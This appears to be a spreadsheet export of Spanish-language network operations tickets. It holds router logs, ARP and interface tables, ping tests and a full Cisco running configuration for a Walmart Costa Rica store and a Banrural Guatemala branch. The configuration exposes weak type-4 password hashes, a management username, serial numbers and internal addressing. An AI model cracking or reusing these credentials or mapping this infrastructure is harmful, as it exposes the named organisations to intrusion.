JUN  5 2022 22:18:48-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[15]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 29 2022 22:16:16-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[16]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 29 2022 05:02:55-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[17]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 29 2022 05:02:15-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[18]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 22 2022 22:16:06-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[19]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 22 2022 12:35:20-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[20]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
MAY 22 2022 12:35:20-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[21]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
MAY 22 2022 12:35:20-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[22]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
MAY 22 2022 12:35:20-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[23]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
MAY 22 2022 12:35:12-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[24]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
MAY 22 2022 12:30:06-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/3/NBR_DOWN_REASON(L)[25]:NEIGHBOR STATE LEAVES FULL OR CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORROUTERID=22.39.199.67, NEIGHBORAREAID=0, NEIGHBORINTERFACE=GIGABITETHERNET0/0/1,NEIGHBORDOWNIMMEDIATE REASON=NEIGHBOR DOWN DUE TO INACTIVITY, NEIGHBORDOWNPRIMEREASON=HELLO NOT SEEN, NEIGHBORCHANGETIME=2022-05-22 12:30:06-06:00)
MAY 22 2022 12:30:06-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/3/NBR_CHG_DOWN(L)[26]:NEIGHBOR EVENT:NEIGHBOR STATE CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=INACTIVITYTIMER, NEIGHBORPREVIOUSSTATE=FULL, NEIGHBORCURRENTSTATE=DOWN)
MAY 16 2022 11:47:08-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[27]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 16 2022 11:46:28-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[28]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 16 2022 11:45:48-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[29]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 16 2022 10:44:46-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[30]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 16 2022 10:44:06-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[31]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 16 2022 10:43:27-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[32]:LAST MESSAGE REPEATED 6 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 06:32:39-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[33]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 06:31:59-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[34]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 06:31:19-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[35]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 06:15:25-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[36]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 06:14:45-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[37]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 06:14:05-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[38]:LAST MESSAGE REPEATED 6 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 05:30:26-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[39]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 05:29:46-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[40]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 12 2022 05:29:12-06:00 CC_WALMART_CR_TIENDA_4486 %%01INFO/4/SUPPRESS_LOG(L)[41]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683713, MODULENAME=SNMP, INFOALIAS=SNMP_IP_LOCK)
APR 30 2022 05:58:47-06:00 CC_WALMART_CR_TIENDA_4486 %%01BGP/3/STATE_CHG_UPDOWN(L)[42]:THE STATUS OF THE PEER 10.201.11.1 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
APR 30 2022 05:58:20-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[43]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
APR 30 2022 05:58:20-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[44]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
APR 30 2022 05:58:20-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[45]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
APR 30 2022 05:58:19-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[46]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
APR 30 2022 05:58:15-06:00 CC_WALMART_CR_TIENDA_4486 %%01BGP/3/STATE_CHG_UPDOWN(L)[47]:THE STATUS OF THE PEER 10.201.41.1 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
APR 30 2022 05:58:05-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFPDT/4/DRVICOUTSTR(L)[48]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
APR 30 2022 05:58:05-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFPDT/4/DRVICOUTSTR(L)[49]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
APR 30 2022 05:57:59-06:00 CC_WALMART_CR_TIENDA_4486 %%01OSPF/4/NBR_CHANGE_E(L)[50]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.158, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
APR 30 2022 05:57:57-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFNET/4/LINK_STATE(L)[51]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
APR 30 2022 05:57:57-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFPDT/4/IF_STATE(L)[52]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
APR 30 2022 05:57:43-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFNET/4/LINK_STATE(L)[53]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2104 HAS ENTERED THE UP STATE.
APR 30 2022 05:57:43-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFNET/4/LINK_STATE(L)[54]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1104 HAS ENTERED THE UP STATE.
APR 30 2022 05:57:43-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFPDT/4/IF_STATE(L)[55]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
APR 30 2022 05:57:41-06:00 CC_WALMART_CR_TIENDA_4486 %%01DEV/4/ENTUP(L)[56]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
APR 30 2022 05:57:40-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFPDT/4/IF_STATE(L)[57]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
APR 30 2022 05:57:39-06:00 CC_WALMART_CR_TIENDA_4486 %%01IFPDT/4/IF_STATE(L)[58]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
APR 30 2022 05:57:33-06:00 CC_WALMART_CR_TIENDA_4486 %%01RM/4/ROUTERID_CHANGE(L)[59]:THE ROUTER ID IS 10.201.11.21. (INSTANCEID=0)
APR 30 2022 05:57:30+00:00 CC_WALMART_CR_TIENDA_4486 %%01IFNET/4/LINK_STATE(L)[60]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
APR 30 2022 05:57:24+00:00 CC_WALMART_CR_TIENDA_4486 %%01IFPDT/4/DRVICOUTSTR(L)[61]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
APR 30 2022 11:56:59+00:00 CC_WALMART_CR_TIENDA_4486 %%01GTL/4/STATECHANGED(L)[62]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_WALMART_CR_TIENDA_4486&gt;
DISPLAY CLOCK
2022-06-19 00:06:49
SUNDAY
TIME ZONE(6) : UTC-06:00
&lt;CC_WALMART_CR_TIENDA_4486&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
22.32.5.157     60DE-F329-2F85            I -         GE0/0/1
22.32.5.158     0081-C47D-A403  6         D-0         GE0/0/1
10.201.11.21    60DE-F329-2F85            I -         GE0/0/0.1104
10.201.11.1     505D-AC64-7F7C  20        D-0         GE0/0/0.1104
                                          1104/-
10.201.41.21    60DE-F329-2F85            I -         GE0/0/0.2104
10.201.41.1     F4DE-AF06-70A8  20        D-0         GE0/0/0.2104
                                          2104/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_4486&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC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DOWN     WAN PRINCIPAL/_/CONTR0001428099OC                                               /_/
GE0/0/0.1104                  UP      UP       PRIMARY LINK TO MTR105
GE0/0/0.2104                  UP      UP       REDUNDANCY LINK TO MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     HUAWEI, AR SERIES, GIGABITETHERNE                                               T0/0/2 INTERFACE
GE0/0/3                       *DOWN   DOWN     HUAWEI, AR SERIES, GIGABITETHERNE                                               T0/0/3 INTERFACE
GE0/0/4                       *DOWN   DOWN     HUAWEI, AR SERIES, GIGABITETHERNE                                               T0/0/4 INTERFACE
GE0/0/5                       *DOWN   DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       *DOWN   DOWN     LAN DEL CLIENTE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               1 INTERFACE
&lt;CC_WALMART_CR_TIENDA_4486&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 6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04         10.201.11.21/26      UP         UP
GIGABITETHERNET0/0/0.2104         10.201.41.21/26      UP         UP
GIGABITETHERNET0/0/1              22.32.5.157/30       UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.99.75.199/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           UNASSIGNED           *DOWN      DOWN
&lt;CC_WALMART_CR_TIENDA_4486&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_WALMART 10.201.11.21
  PING 10.201.11.21: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.11.21 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/3/4 MS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_WALMART 10.201.11.21
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.201.11.0/26  DIRECT  0    0             D   10.201.11.1     GIGABITETHERNET4/0/1.1104			</t>
  </si>
  <si>
    <t>F4611661</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENCUENTRA OPERATIVO NO SE TIENEN ALARMAS RECIENTES SE PROCEDE CON CIERRE POR PARTE DE CLARO SERVICIO OK
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 5 DÍA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892 UPTIME IS 5 DAYS, 9 HOURS, 28 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 21:21:55 UTC THU JUN 16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8Y082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8Y082
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0892#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4294 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0892
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1618Y082
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.122.17 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN REDUNDANTE/_/8902030T/_/
 BANDWIDTH 512
 NO IP ADDRESS
 NO IP REDIRECTS
 NO IP UNREACHABLES
 NO IP PROXY-ARP
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/0.2249
 DESCRIPTION WAN REDUNDANTE/_/8902030T/_/
 BANDWIDTH 512
 ENCAPSULATION DOT1Q 2249
 IP ADDRESS 10.72.123.28 255.255.255.128
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/8901814T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.72.90.149 255.255.255.224
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
 NO CDP ENABLE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8.92.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.168.92.126 255.255.255.0
 LOAD-INTERVAL 30
!
ROUTER OSPF 1
 ROUTER-ID 10.72.90.149
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.90.128 0.0.0.31 AREA 164
 NEIGHBOR 10.72.90.157
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.123.1 225 NAME REDUNDANCIA_WX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.212.122.17/32
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.168.92.0/24
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.138.92.16/29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LOCAL DEL EDIFICIO MUNICIPAL PASACO, JUTIAP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892#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 59 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 59 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 63 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.583: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JUN 16 21:22:11.567: %ESWMRVL_FLTMG-5-NOTICE: NOTICE: FPGA REV 0X71
JUN 16 21:22:16.391: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO RESET
JUN 16 21:22:16.391: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO RESET
JUN 16 21:22:17.379: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
JUN 16 21:22:17.587: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 16 21:22:17.587: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 16 21:22:18.439: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 16 21:22:18.443: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 16 21:22:18.923 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUN 16 21:22:19.619 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUN 16 21:22:20.667 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 16 21:22:20.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 16 21:22:20.859 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 16 21:22:20.859 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 16 21:22:20.859 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 16 21:22:21.007 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
JUN 16 21:22:21.519 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2012 BY CISCO SYSTEMS, INC.
COMPILED WED 29-FEB-12 19:19 BY PROD_REL_TEAM
JUN 16 21:22:21.699 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0892 IS UNDERGOING A COLD START
JUN 16 21:22:22.319 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
JUN 16 21:22:22.319 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 16 21:22:22.319 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 16 21:22:22.319 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO DOWN
JUN 16 21:22:22.319 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO DOWN
JUN 16 21:22:22.319 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO DOWN
JUN 16 21:22:22.319 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
JUN 16 21:22:22.323 UTC: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.212.122.17 IN NSSA 164 - P-BIT CLEARED
JUN 16 21:22:23.519 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 16 21:22:26.431 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 16 21:22:27.431 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 16 21:22:51.747 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
JUN 16 21:23:00.443 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.156 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 16 21:23:06.375 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.157 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 16 21:23:09.207 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 16 21:23:18.403 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
